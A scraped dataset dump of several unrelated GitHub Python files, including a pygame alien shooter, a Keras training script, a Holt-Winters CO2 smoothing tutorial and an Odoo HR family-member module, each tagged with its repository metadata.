'''\r\n \r\n ##################################\r\n ###### End fitness function ######\r\n ##################################\r\n old_nr_ch = nr_ch\r\n self.breed_selector(Survived_W, Survived_B, Survived_W_2, Survived_B_2, Survived_money,Survived_edu, Survived_food, Survived_fitness, Survived_age, Survived_breed)\r\n \r\n \r\n self.TOPOP.append(len(self.CH_food))\r\n self.MAXE.append(max(self.CH_edu))\r\n self.MAXM.append(max(self.CH_money))\r\n #MAXF.append(max(self.CH_food))\r\n self.MAXFO.append(max(self.CH_food))\r\n self.avg_age.append( average(self.CH_age) )\r\n \r\n #CH_breed = [0]*len(CH_edu) #Number of characters\r\n\r\n \r\n return MAXE,MAXM,MAXF,MAXFO, TOPOP, 0\r\n\r\n#if restart == True:\r\n# CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age = define_char(H, NR_CH)\r\n# CH_W_2, CH_B_2, _, _, _, _, _, _ = define_char(H2, NR_CH, CH_W = [], CH_B = [], CH_money = [],\r\n# CH_edu = [], CH_food = [], CH_fitness = [], CH_breed = [], CH_age=[])\r\n\r\nTRAINING = True\r\nNR_CH = 100\r\nMUTATION_COEFF = 0.001\r\n\r\nInput = 5 #edu, money, food, invest, age\r\nOutput = 5 #school, work, buy food, breed, invest\r\nnr_stats_prio = 6\r\nH = [Input + nr_stats_prio, 20,Output] #1 input, 2 hidden, 1 output\r\n\r\nInput_2 = 3\r\nOutput_2 = 1 #Choose whom to breed with, using the same input except age\r\nH2 = [Input_2,40,Output_2]\r\n\r\nrestart = True\r\n\r\ns = Genetic( H, H2, NR_CH, MUTATION_COEFF, TRAINING )\r\ns.start_game()\r\n\r\n\r\n\r\nend = time.time()\r\nprint(end - start)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Simonws92/Code","sub_path":"Genetic/Society/Society_main.py","file_name":"Society_main.py","file_ext":"py","file_size_in_byte":24291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4663474392","text":"#!/usr/bin/env python3\n\nimport random\n\nfrom project.utils import *\nfrom project.HCSR04 import Sensor\nfrom project.constants import *\nfrom project.components.vaisseau import Vaisseau, Tir\nfrom project.components.alien import Alien\nfrom project.components.explosion import Explosion\nfrom project.components.score import Score\nfrom project.components.background import Background\n\n# see if we can load more than standard BMP\nif not pygame.image.get_extended():\n raise SystemExit(\"Sorry, extended image module required\")\n\n\nmain_dir = os.path.split(os.path.abspath(__file__))[0]\n\n\ndef images():\n \"\"\"\n Cette methode s'occupe de charger et d'assigner les images au elements du jeu qui en ont besoin\n :return: ∅\n \"\"\"\n s =load_image('lololol.gif') # le fichier utils.py\n Vaisseau.image = pygame.transform.scale(s, (50, 50))\n img = load_image('explosion1.gif')\n Explosion.images = [img, pygame.transform.flip(img, 1, 1)]\n Alien.images = load_images('coucou2.gif')\n t = load_image('pokeball.gif')\n Tir.image = pygame.transform.scale(t, (50, 50))\n Background.image = load_image('background.jpeg')\n\n\ndef fenetre():\n \"\"\"\n Cette methode regle la fenetre de jeu, on choisit un titre, une icone, et on definit si on veut voir la souris\n apparaitre ou non\n :return: ∅\n \"\"\"\n icon = pygame.transform.scale(Alien.images[0], (32, 32)) # On utilise l'image de l'alien et on la redimensionne\n pygame.display.set_icon(icon) # On definit une icone\n pygame.display.set_caption('Pygame Aliens') # On choisit le titre\n pygame.mouse.set_visible(0) # On cache la souris\n\n\ndef sons():\n \"\"\"\n Cette methode s'occupe de charger les sons du jeu et lance la musique principale\n :return: boom_sound, shoot_sound => Les sons d'explosion et de tir\n \"\"\"\n boom_sound = load_sound('boom.wav') # On utilise ici la methode load_sound definie dans utils.py\n shoot_sound = load_sound('car_door.wav')\n if pygame.mixer and SONS:\n music = os.path.join(main_dir, 'src/sound', 'house_lo.wav')\n pygame.mixer.music.load(music)\n pygame.mixer.music.play(-1)\n\n return boom_sound, shoot_sound\n\n\ndef main():\n \"\"\"\n Fonction principale, appellee lors de l'execution du script\n :return: ∅\n \"\"\"\n # Initialisation de pygame\n if pygame.get_sdl_version()[0] == 2:\n pygame.mixer.pre_init(44100, 32, 2, 1024)\n pygame.init()\n if pygame.mixer and not pygame.mixer.get_init():\n print('Warning, no sound')\n pygame.mixer = None\n\n # Definit le mode de la fenetre\n winstyle = 0 # FULLSCREEN\n bestdepth = pygame.display.mode_ok(ECRAN.size, winstyle, 32)\n screen = pygame.display.set_mode(ECRAN.size, winstyle, bestdepth)\n\n # Chargement des images et assignement aux classes\n images()\n\n # Reglage de la fenetre\n fenetre()\n boom_sound, shoot_sound = sons()\n #sensor = Sensor()\n\n # On cree des groupes de jeu (un peu mystique, ce sont des listes qui vont garder une trace des differents elements\n # qui seront crees et qui les ajoutent automatiquement lors de leur creation)\n aliens = pygame.sprite.Group()\n shots = pygame.sprite.Group()\n all = pygame.sprite.RenderUpdates()\n lastalien = pygame.sprite.GroupSingle()\n back = pygame.sprite.RenderUpdates()\n\n # On assigne a chaque classe un (ou des) groupe(s) qui lui correspond(ent)\n #Background.containers = all\n Background.containers = back\n Vaisseau.containers = all\n Alien.containers = aliens, all, lastalien\n Tir.containers = shots, all\n Explosion.containers = all\n Score.containers = all\n\n # On definit quelques valeurs de depart\n alien_suivant = NOUVEL_ALIEN\n clock = pygame.time.Clock()\n\n # On initialise les elements du jeu, nous n'avons pas toujours besoin de garder une reference grace a l'utilisation\n # des containers, qui s'occupent de les recuperer lors de leur creation (plus de details dans les differents\n # elements)\n #Background(0) # On cree deux images de fond d'ecran, qui se suivent, pour qu'au moins\n #Background(Background.image.get_width()) # une se trouve a chaque fois visible par l'utilisateur\n \n Background(0)\n player = Vaisseau() # On cree le joueur, on garde une reference pour pouvoir lui appliquer des actions\n score = Score() # On cree le score, on garde une reference pour pouvoir le mettre a jour\n Alien() # On cree un premier alien\n # Ici le jeu commence vraiment, dans cette boucle est defini toute la mecanique du jeu\n while player.alive():\n \n\n # get input\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\n return\n\n keystate = pygame.key.get_pressed()\n\n # On efface le contenu de l'ecran\n all.clear(screen, pygame.Surface(ECRAN.size))\n\n # On rafraichit tous les elements\n all.update()\n\n # On reagit aux actions du joueur\n #dirx = keystate[pygame.K_RIGHT] - keystate[pygame.K_LEFT]\n #diry = keystate[pygame.K_DOWN] - keystate[pygame.K_UP]\n #player.move((dirx, diry))\n if keystate[pygame.K_UP]:\n player.move((0,1))\n if keystate[pygame.K_DOWN]:\n player.move((0,-1))\n if keystate[pygame.K_RIGHT]:\n player.move((1,0))\n if keystate[pygame.K_LEFT]:\n player.move((-1,0))\n firing = keystate[pygame.K_SPACE]\n if not player.reloading and firing and len(shots) < MAX_TIRS:\n Tir(player.gunpos())\n if SONS:\n shoot_sound.play()\n player.reloading = firing\n\n # Creation (eventuelle) d'un nouvel alien\n if alien_suivant > 0:\n alien_suivant = alien_suivant - 1\n elif len(aliens) <= MAX_ALIEN and not int(random.random() * PROBA_ALIEN):\n Alien()\n alien_suivant = NOUVEL_ALIEN\n\n # Detection des collisions\n for alien in pygame.sprite.spritecollide(player, aliens, 1):\n if SONS:\n boom_sound.play()\n Explosion(alien)\n Explosion(player)\n score.point()\n player.kill()\n\n for alien in pygame.sprite.groupcollide(shots, aliens, 1, 1).keys():\n if SONS:\n boom_sound.play()\n Explosion(alien)\n score.point()\n\n # On dessine les elements\n dirty = back.draw(screen)\n pygame.display.update(dirty)\n dirty = all.draw(screen)\n pygame.display.update(dirty)\n\n # On definit le taux de rafraichissement de la fenetre\n clock.tick(30) # La fenetre ne se rafraichira jamais plus de 30 fois par seconde\n\n # La partie est terminee, on affiche dans le terminal le score final\n print(\"Final score = \" + str(score.score()))\n\n pygame.quit()\n\n\n# appelle la fonction main si on execute le script\nif __name__ == '__main__':\n main()\n\n","repo_name":"geverartsdev/TechnofuturTIC","sub_path":"Flo et toto/POKEMON/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44363788422","text":"\"\"\"\nTrains an ML model, makes predictions on the data and evaluates it.\n\"\"\"\n\nimport arrow\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras.utils import np_utils\nimport numpy as np\nimport os\nimport pandas as pd\nimport random\nimport shutil\nfrom sklearn.metrics import roc_auc_score\n\nfrom capture import CaptureStdout\nfrom evaluate import evaluate_model\nfrom model_arch import create_model\nfrom prepare_training_data import load_data\n\ndef train_model(model, x, y, ix, model_dir, evaluation_dir,\n batch_size=32, epoch_count=30, enable_tensorboard=False):\n with open(model_dir + '/model_arch.yaml', 'w') as f:\n f.write(model.to_yaml())\n\n with open(model_dir + '/model_summary.txt', 'w') as f:\n with CaptureStdout() as output:\n model.summary()\n f.write(str(output))\n\n callbacks = []\n\n # TODO: Better save the whole model with weights.\n # It can then be loaded at once, including compilation.\n callbacks.append(ModelCheckpoint(model_dir + '/model_weights.h5',\n monitor='val_loss', verbose=1,\n save_best_only=True, save_weights_only=True,\n mode='auto'))\n\n if enable_tensorboard:\n callbacks.append(TensorBoard(log_dir=model_dir + '/tensorboard',\n histogram_freq=1))\n\n training_hist = model.fit(\n x[ix['train']], y[ix['train']],\n validation_data=(x[ix['valid']], y[ix['valid']]),\n batch_size=batch_size, nb_epoch=epoch_count,\n callbacks=callbacks,\n verbose=1)\n\n store_learning_curves(training_hist, evaluation_dir)\n\n return model\n\n\ndef predict(model, x, y, ix, output_dir):\n \"\"\"\n Store predictions in a CSV file and predicted probabilities in an NPZ file.\n \"\"\"\n\n y_proba_pred = model.predict(x)\n np.savez_compressed(output_dir + '/predictions_proba.npz',\n y_proba_pred=y_proba_pred)\n\n df = pd.DataFrame({\n 'y_pred': np_utils.probas_to_classes(y_proba_pred),\n 'y_true': np_utils.categorical_probas_to_classes(y)})\n\n df['accurate'] = df['y_true'] == df['y_pred']\n\n df['split'] = ''\n for key, indexes in ix.items():\n df.ix[indexes, 'split'] = key\n\n df = df[['split', 'y_true', 'y_pred', 'accurate']]\n\n df.to_csv(output_dir + '/predictions.csv', index=None)\n\n return y_proba_pred\n\n\ndef compute_final_metrics(model, x, y, ix, y_proba_pred, evaluation_dir):\n splits = ['train', 'valid', 'test']\n metrics = pd.DataFrame([\n model.evaluate(x[ix[split]], y[ix[split]], verbose=0)\n for split in splits\n ],\n columns=model.metrics_names,\n index=splits)\n metrics.index.name = 'split'\n metrics['error'] = 1.0 - metrics['acc']\n metrics['count'] = [len(ix[split]) for split in splits]\n metrics['abs_error'] = (metrics['error'] * metrics['count']).astype(int)\n\n metrics['auc'] = [roc_auc_score(y[ix[split]], y_proba_pred[ix[split]])\n for split in splits]\n\n print(metrics)\n metrics.to_csv(evaluation_dir + '/final_metrics.csv', float_format='%.5f')\n\n\ndef store_learning_curves(training_hist, evaluation_dir):\n df = pd.DataFrame(training_hist.history)\n df.rename(columns={\n 'acc': 'train_acc', 'loss': 'train_loss',\n 'val_acc': 'valid_acc', 'val_loss': 'valid_loss'\n }, inplace=True)\n df['train_error'] = 1.0 - df['train_acc']\n df['valid_error'] = 1.0 - df['valid_acc']\n df.to_csv(evaluation_dir + '/learning_curves.csv', index=None)\n\n\ndef prepare_dirs(dirs):\n for d in dirs:\n os.makedirs(d, exist_ok=True)\n\n\ndef store_model_files(input_dir, model_dir):\n shutil.copy(\n input_dir + '/preproc_transformers.json',\n model_dir + '/preproc_transformers.json')\n shutil.copy('model_arch.py', model_dir + '/model_arch.py')\n\ndef generate_model_id():\n \"\"\"\n Returns a model id based on timestamp with some random part to prevent potential collisions.\n \"\"\"\n date_part = arrow.utcnow().format('YYYY-MM-DD_HH-mm-ss')\n random_part = random.randint(0, 2<<31)\n return '%s_%x' % (date_part, random_part)\n\nif __name__ == '__main__':\n model_id = generate_model_id()\n print('model id:', model_id)\n\n base_dir = 'data/working/single-notes-2000'\n input_dir = base_dir + '/features-04-unscaled/training-data'\n model_dir = base_dir + '/models/' + model_id\n output_dir = model_dir + '/output-data'\n evaluation_dir = model_dir + '/evaluation'\n\n prepare_dirs([input_dir, model_dir, output_dir, evaluation_dir])\n\n store_model_files(input_dir, model_dir)\n\n x, y, ix = load_data(input_dir)\n\n model = create_model(input_shape=x.shape[1:], class_count=y.shape[1])\n model.summary()\n model = train_model(model,\n x, y, ix,\n model_dir, evaluation_dir,\n epoch_count=30)\n\n y_proba_pred = predict(model, x, y, ix, output_dir)\n\n compute_final_metrics(model, x, y, ix, y_proba_pred, evaluation_dir)\n\n evaluate_model(input_dir, model_dir)\n","repo_name":"bzamecnik/ml","sub_path":"instrument-classification/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"67"} +{"seq_id":"72802072214","text":"'''\nUFPA - LASSE - Telecommunications, Automation and Electronics Research and Development Center - www.lasse.ufpa.br\nCAVIAR - Communication Networks and Artificial Intelligence Immersed in Virtual or Augmented Reality\nAilton Oliveira, Felipe Bastos, João Borges, Emerson Oliveira, Daniel Takashi, Lucas Matni, Rebecca Aben-Athar, Aldebaro Klautau (UFPA): aldebaro@ufpa.br\nCAVIAR: https://github.com/lasseufpa/ITU-Challenge-ML5G-PHY-RL.git\n\nScript to test telecommunications dynamics/environment\nV1.0\n'''\n\nimport numpy as np\nfrom communications.buffer import Buffer\nfrom communications.base_station import BaseStation\nfrom communications.ue import UE\n\nuse_airsim = False\nobj_type = 'UAV'\n\n# Test integration\nprint('/////////////// Test integration ///////////////')\nepisode = [0,1]\n#episode = [0]\nue1 = UE(name='uav1', obj_type=obj_type, total_number_rbs=17, episode=episode, use_airsim=use_airsim)\nue2 = UE(name='simulation_car1', obj_type=obj_type, total_number_rbs=17, episode=episode, use_airsim=use_airsim)\nue3 = UE(name='simulation_pedestrian1', obj_type=obj_type, total_number_rbs=17, episode=episode, use_airsim=use_airsim)\ncaviar_bs = BaseStation(Elements=64, frequency=60e9,name='BS1',ep_lenght=20, traffic_type='light', BS_type = 'UPA')\n#Append users\ncaviar_bs.append(ue1)\ncaviar_bs.append(ue2)\ncaviar_bs.append(ue3)\n\nuser = -1\naction = 32\n\nfor i in range(20):\n\tif user == 2:\n\t\tuser = -1\n\tuser += 1\n\tstate, reward, feedback ,done = caviar_bs.step(user,action)\n\tprint('User ID: ', caviar_bs.UEs[user].ID, 'Buffer: ', caviar_bs.UEs[user].buffer, 'BS TYPE: ', caviar_bs._type)\n\tprint('###')\n\n","repo_name":"lasseufpa/ITU-Challenge-ML5G-PHY-RL","sub_path":"test_communications.py","file_name":"test_communications.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"67"} +{"seq_id":"4407039456","text":"##################################################\n# Smoothing Methods (Holt-Winters)\n##################################################\n\nimport itertools\nimport warnings\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom sklearn.metrics import mean_absolute_error\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing # hotwinters\nfrom statsmodels.tsa.holtwinters import SimpleExpSmoothing\nfrom statsmodels.tsa.seasonal import seasonal_decompose # zaman serisini bileşene ayırmak için\nimport statsmodels.tsa.api as smt\n\nwarnings.filterwarnings('ignore')\n\n\n############################\n# Veri Seti\n############################\n\n# Atmospheric CO2 from Continuous Air Samples at Mauna Loa Observatory, Hawaii, U.S.A.\n# Period of Record: March 1958 - December 2001\n\ndata = sm.datasets.co2.load_pandas() # HAFTALIK CO2 SALINIMI DATASETİ\ny = data.data\n\ny = y['co2'].resample('MS').mean() # HAFTALIKTAN ZİYADE AYLARA GÖRE GÖZLEMLEMEK İÇİN\n\ny.isnull().sum() # NULL DEĞERLER\n\ny = y.fillna(y.bfill()) # MOD MEDYANDAN ZİYADE GÖZLEM KENDİNDEN ÖNCEKİ GÖZLEMLE DOLDURULUR\n\ny.plot(figsize=(15, 6))\nplt.show()\n\n\n############################\n# Holdout\n############################\n\ntrain = y[:'1997-12-01'] #1997 DEN ÖNCEKİ DATALARI TRAIN OLARAK AL\nlen(train) # 478 ay\n\n# 1998'ilk ayından 2001'in sonuna kadar test set.\ntest = y['1998-01-01':] # 98 İN İLK AYINDAN İTİBAREN DE TEST SETİ\nlen(test) # 48 ay\n\n##################################################\n# Zaman Serisi Yapısal Analizi\n##################################################\n\n# Durağanlık Testi (Dickey-Fuller Testi) # DURAĞANLIK\n\ndef is_stationary(y):\n\n # \"HO: Non-stationary\" # P VALUE 0.05 TEN DÜŞÜKSE H0 RED EDİLİR\n # \"H1: Stationary\"\n\n p_value = sm.tsa.stattools.adfuller(y)[1]\n if p_value < 0.05:\n print(F\"Result: Stationary (H0: non-stationary, p-value: {round(p_value, 3)})\")\n else:\n print(F\"Result: Non-Stationary (H0: non-stationary, p-value: {round(p_value, 3)})\")\n\nis_stationary(y)\n\n# Zaman Serisi Bileşenleri ve Durağanlık Testi # LEVEL, TREND, SEAOSANAL, RESIUDALS BİLEŞENLERİ TEST ETMEK İÇİN FONKSİYON\ndef ts_decompose(y, model=\"additive\", stationary=False):\n result = seasonal_decompose(y, model=model)\n fig, axes = plt.subplots(4, 1, sharex=True, sharey=False)\n fig.set_figheight(10)\n fig.set_figwidth(15)\n\n axes[0].set_title(\"Decomposition for \" + model + \" model\")\n axes[0].plot(y, 'k', label='Original ' + model)\n axes[0].legend(loc='upper left')\n\n axes[1].plot(result.trend, label='Trend')\n axes[1].legend(loc='upper left')\n\n axes[2].plot(result.seasonal, 'g', label='Seasonality & Mean: ' + str(round(result.seasonal.mean(), 4)))\n axes[2].legend(loc='upper left')\n\n axes[3].plot(result.resid, 'r', label='Residuals & Mean: ' + str(round(result.resid.mean(), 4)))\n axes[3].legend(loc='upper left')\n plt.show(block=True)\n\n if stationary:\n is_stationary(y)\n\nts_decompose(y, stationary=True)\n\n\n##################################################\n# Single Exponential Smoothing\n##################################################\n\n# SES = Level 'I MODELLER\n\nses_model = SimpleExpSmoothing(train).fit(smoothing_level=0.5) # TRAINE FIT EDIYORUM ALFA HİPERPARAMETRESİ\n\ny_pred = ses_model.forecast(48) # BURDA PREDICT YERINE FORECAST KULLANILIR\n\nmean_absolute_error(test, y_pred) # TAHMİN SONUÇLARI İLE GERÇEK DEĞERLERİN FARKLARIN FARKIYLA HATALAR ÖLÇÜLÜR.\n\ntrain.plot(title=\"Single Exponential Smoothing\") # MODEL TAHMİNİ İLE TEST SONUÇLARI GÖRSELLEŞTİRMESİ\ntest.plot()\ny_pred.plot()\nplt.show()\n\n\ntrain[\"1985\":].plot(title=\"Single Exponential Smoothing\")\ntest.plot()\ny_pred.plot()\nplt.show()\n\n\ndef plot_co2(train, test, y_pred, title): # CO2 DATASETİNDE TAHMİNLER İLE TEST VERİLERİ GÖRSELLEŞTİRMESİ\n mae = mean_absolute_error(test, y_pred)\n train[\"1985\":].plot(legend=True, label=\"TRAIN\", title=f\"{title}, MAE: {round(mae,2)}\")\n test.plot(legend=True, label=\"TEST\", figsize=(6, 4))\n y_pred.plot(legend=True, label=\"PREDICTION\")\n plt.show()\n\nplot_co2(train, test, y_pred, \"Single Exponential Smoothing\")\n\nses_model.params # SMOOTHING LEVEL 0.5 ALFA PARAMETRESİ\n\n############################\n# Hyperparameter Optimization\n############################\n\ndef ses_optimizer(train, alphas, step=48):\n\n best_alpha, best_mae = None, float(\"inf\")\n\n for alpha in alphas:\n ses_model = SimpleExpSmoothing(train).fit(smoothing_level=alpha)\n y_pred = ses_model.forecast(step)\n mae = mean_absolute_error(test, y_pred)\n\n if mae < best_mae:\n best_alpha, best_mae = alpha, mae\n\n print(\"alpha:\", round(alpha, 2), \"mae:\", round(mae, 4))\n print(\"best_alpha:\", round(best_alpha, 2), \"best_mae:\", round(best_mae, 4))\n return best_alpha, best_mae\n\nalphas = np.arange(0.8, 1, 0.01) # SES ZAYIF Bİ MODEL O YÜZDEN ÖĞRENME PARAMETRESİNİ REMEMBERA GÖRE YÜKSEK TUTUYORUM\n\n# yt_sapka = a * yt-1 + (1-a)* (yt_-1)_sapka\n\nses_optimizer(train, alphas) # BEST ALPHA 0.99\n\nbest_alpha, best_mae = ses_optimizer(train, alphas)\n\n############################\n# Final SES Model\n############################\n\nses_model = SimpleExpSmoothing(train).fit(smoothing_level=best_alpha) # FINAL SES MODELI\ny_pred = ses_model.forecast(48) # 48 ADIMLIK TAHMİN ET.\n\nplot_co2(train, test, y_pred, \"Single Exponential Smoothing\") # VERİLEN\n\n\n##################################################\n# Double Exponential Smoothing (DES)\n##################################################\n\n# DES: Level (SES) + Trend\n\n#!!!!!!!!!!!!!!!!!! MEVSİMSELİK VE ARTIKLAR GRAFİKTE TRENDE BAĞLI DEĞİLSE TOPLAMSALDIR.\n\n# y(t) = Level + Trend + Seasonality + Noise # ADDİTİVE\n# y(t) = Level * Trend * Seasonality * Noise # ÇARPIMSAL\n\n# MUL VE ADD OLARAK DEĞER VER HANGİSİ DAHA AZ HATA VERİYORSA ONU AL.\n\nts_decompose(y) # --> ADDITIVE\n\ndes_model = ExponentialSmoothing(train, trend=\"add\").fit(smoothing_level=0.5,\n smoothing_trend=0.5)\n\ny_pred = des_model.forecast(48)\n\nplot_co2(train, test, y_pred, \"Double Exponential Smoothing\")\n\n############################\n# Hyperparameter Optimization\n############################\n\n\ndef des_optimizer(train, alphas, betas, step=48): # HİPERPARAMETRE OPT İÇİN KULLANACAĞIMIZ DES FONKSİYONU\n best_alpha, best_beta, best_mae = None, None, float(\"inf\")\n for alpha in alphas:\n for beta in betas:\n des_model = ExponentialSmoothing(train, trend=\"add\").fit(smoothing_level=alpha, smoothing_slope=beta)\n y_pred = des_model.forecast(step)\n mae = mean_absolute_error(test, y_pred)\n if mae < best_mae:\n best_alpha, best_beta, best_mae = alpha, beta, mae\n print(\"alpha:\", round(alpha, 2), \"beta:\", round(beta, 2), \"mae:\", round(mae, 4))\n print(\"best_alpha:\", round(best_alpha, 2), \"best_beta:\", round(best_beta, 2), \"best_mae:\", round(best_mae, 4))\n return best_alpha, best_beta, best_mae\n# DES İÇERİSİNDE HEM ALFA HEM BETAYI ARIYOR OLACAĞIZ.\n\nalphas = np.arange(0.01, 1, 0.10) # ALFALARI GEZECEĞİ ARALIK\nbetas = np.arange(0.01, 1, 0.10) # BETALARI GEZECEĞİ ARALIK\n\nbest_alpha, best_beta, best_mae = des_optimizer(train, alphas, betas) # BEST DEĞERLER.\n\n\n\n\n############################\n# Final DES Model\n############################\n\nfinal_des_model = ExponentialSmoothing(train, trend=\"add\").fit(smoothing_level=best_alpha, # TRAIN = 'MUL' ÇARPIMSAL\n smoothing_slope=best_beta) # TREND'I ADDITIVE OLARAK GİRDİK ÇÜNKÜ ADDITIVE BİR MODEL\n\ny_pred = final_des_model.forecast(48)\n\nplot_co2(train, test, y_pred, \"Double Exponential Smoothing\")\n\n\n##################################################\n# Triple Exponential Smoothing (Holt-Winters)\n##################################################\n\n# TES = SES + DES + Mevsimsellik\n\n\ntes_model = ExponentialSmoothing(train,\n trend=\"add\",\n seasonal=\"add\",\n seasonal_periods=12).fit(smoothing_level=0.5, # MEVSIMSELLIK 12 YANI 12 AYDA BIR SEZON TAMAMLANIYOR\n smoothing_slope=0.5,\n smoothing_seasonal=0.5)\n\ny_pred = tes_model.forecast(48)\nplot_co2(train, test, y_pred, \"Triple Exponential Smoothing\")\n\n############################\n# Hyperparameter Optimization\n############################\n\nalphas = betas = gammas = np.arange(0.20, 1, 0.10) # ARRAYLERİN HEPSİNE EŞİT\n\nabg = list(itertools.product(alphas, betas, gammas)) # OLASI 3 PARAMETRENİN KOMBİNASYONULARINI GETİRİYOR.\n\n\ndef tes_optimizer(train, abg, step=48): # TES METHODUNU OPTIMIZE ETMEK İÇİN KULLANILAN FONKSİYON\n best_alpha, best_beta, best_gamma, best_mae = None, None, None, float(\"inf\")\n for comb in abg:\n tes_model = ExponentialSmoothing(train, trend=\"add\", seasonal=\"add\", seasonal_periods=12).\\\n fit(smoothing_level=comb[0], smoothing_slope=comb[1], smoothing_seasonal=comb[2])\n y_pred = tes_model.forecast(step)\n mae = mean_absolute_error(test, y_pred)\n if mae < best_mae:\n best_alpha, best_beta, best_gamma, best_mae = comb[0], comb[1], comb[2], mae\n print([round(comb[0], 2), round(comb[1], 2), round(comb[2], 2), round(mae, 2)])\n\n print(\"best_alpha:\", round(best_alpha, 2), \"best_beta:\", round(best_beta, 2), \"best_gamma:\", round(best_gamma, 2),\n \"best_mae:\", round(best_mae, 4))\n\n return best_alpha, best_beta, best_gamma, best_mae\n\nbest_alpha, best_beta, best_gamma, best_mae = tes_optimizer(train, abg)\n\n\n############################\n# Final TES Model\n############################\n\nfinal_tes_model = ExponentialSmoothing(train, trend=\"add\", seasonal=\"add\", seasonal_periods=12).\\\n fit(smoothing_level=best_alpha, smoothing_trend=best_beta, smoothing_seasonal=best_gamma)\n\ny_pred = final_tes_model.forecast(48)\n\nplot_co2(train, test, y_pred, \"Triple Exponential Smoothing\")\n\n\n\n\n\n\n\n\n","repo_name":"anilozcan35/DSMLBC8-","sub_path":"7.Modül/time_series/smoothing_methods.py","file_name":"smoothing_methods.py","file_ext":"py","file_size_in_byte":10157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27513625733","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport time\nfrom datetime import datetime\nfrom dateutil import relativedelta\nfrom odoo import models, fields, api, _\nfrom time import strftime, strptime\nfrom datetime import date, datetime\nfrom odoo.exceptions import UserError, ValidationError\n\nclass hr_family_item(Model):\n _name = 'hr.family.item'\n _description = 'Members Familiy'\n _order = 'name desc, age desc'\n\n\n @api.depends('age','birth')\n def _compute_age(self):\n for r in self:\n if not r.birth:\n return\n today_date = datetime.now()\n birth_date = datetime.strptime(r.birth, '%Y-%m-%d')\n delta = today_date - birth_date\n r.age = int(delta.days / 365)\n\n @api.onchange('birth')\n def onchange_birth(self):\n for r in self:\n if br.birth:\n today_date = datetime.now()\n birth_date = datetime.strptime(r.birth, '%Y-%m-%d')\n if birth_date >= today_date:\n raise ValidationError(_('Date of birth can not be higher than the actual date'))\n\n _RELATION = [('hb_wife', 'Wife/Husband'), ('son', 'Son'),\n ('father', 'Father'), ('mother', 'Mother'),\n ('uncle', 'Uncle'), ('brother', 'Brother'),\n ('nephew', 'Nephew'), ('ulibre', 'Free Union'),\n ('entenado', 'Other')]\n _TIPOID = [('id','ID'),('passport','Passport')]\n\n _columns = {\n 'name' : fields.char('Name', size=50, required=True),\n 'sex' : fields.selection([('h', 'Male'), ('m', 'Female')], 'Sex'),\n 'age': fields.function(_compute_age, method=True, string=\"Age\", store=True, type=\"integer\"),\n 'birth' : fields.date('Date of birth', required=True),\n 'relationship' : fields.selection(_RELATION, 'Relationship'),\n 'disabled' : fields.boolean('Discapacitado?', help=\"Marque este campo si la carga familiar es discapacitado, tenga en cuenta que un carga familiar que sea mayor de edad pero con discapacidad se toma en cuenta para el cálculo de utilidades\"),\n 'disabled_type': fields.char('Disabled Type',size=64),\n 'disabled_percent': fields.integer('Disabled Percent'),\n 'disabled_id': fields.char('CONADIS ID',size=10,help=\"CONNADIS identification code.\"),\n 'employee_id' : fields.many2one('hr.employee', 'Employee'),\n 'type_id' : fields.selection(_TIPOID, \"Type ID\"),\n 'identification_id': fields.char(_('Identification Number'), size=13, help=_('Identificator or Unique Register')),\n 'tutela': fields.boolean('Tutela?', help=\"Marque este campo si la carga familiar está bajo tutela, tenga en cuenta que un carga familiar bajo tutela se toma en cuenta para el cálculo de utilidades\"),\n }\n\n _defaults = {\n 'age' : 0,\n }\n\nhr_family_item()\n\nclass hr_employee(osv.osv):\n _inherit = 'hr.employee'\n\n def _compute_utilities_charges(self, cr, uid, ids, field_name, arg, context):\n for employee in self.browse(cr, uid, ids):\n aux = 0\n for family in employee.family_item_ids:\n if family.relationship == 'hb_wife':\n aux += 1\n if family.age < 18:\n aux += 1\n if family.tutela or family.disabled:\n aux += 1\n return {employee.id:aux}\n\n _columns = {\n 'family_item_ids': fields.one2many('hr.family.item', 'employee_id', \"Familiy Members\"),\n 'utilities_charges': fields.function(_compute_utilities_charges, method=True, string=\"Utilities Charges\",\n store=False, type=\"integer\"),\n 'disabled': fields.boolean('Disabled?',help=\"Check this if the employee has any kind of limitation to do some activities, caused by some physics or mental disability.\"),\n 'disabled_type': fields.char('Disabled Type',size=64),\n 'disabled_percent': fields.integer('Disabled Percent'),\n 'disabled_id': fields.char('CONADIS ID',size=10,help=\"CONNADIS identification code.\"),\n\n }\n\n _defaults = {\n 'utilities_charges': 0,\n 'active':True,\n }\n","repo_name":"jclopezar/mascoop","sub_path":"hr_mascoop/models/hr_familia.py","file_name":"hr_familia.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7993185979","text":"import pandas as pd\nimport numpy as np\nimport re, os, datetime\nimport matplotlib.pyplot as plt\n\ndef brief(df):\n returnString = \"\"\n numRows = len(df)\n numColumns = len(df.columns)\n # Append parts of 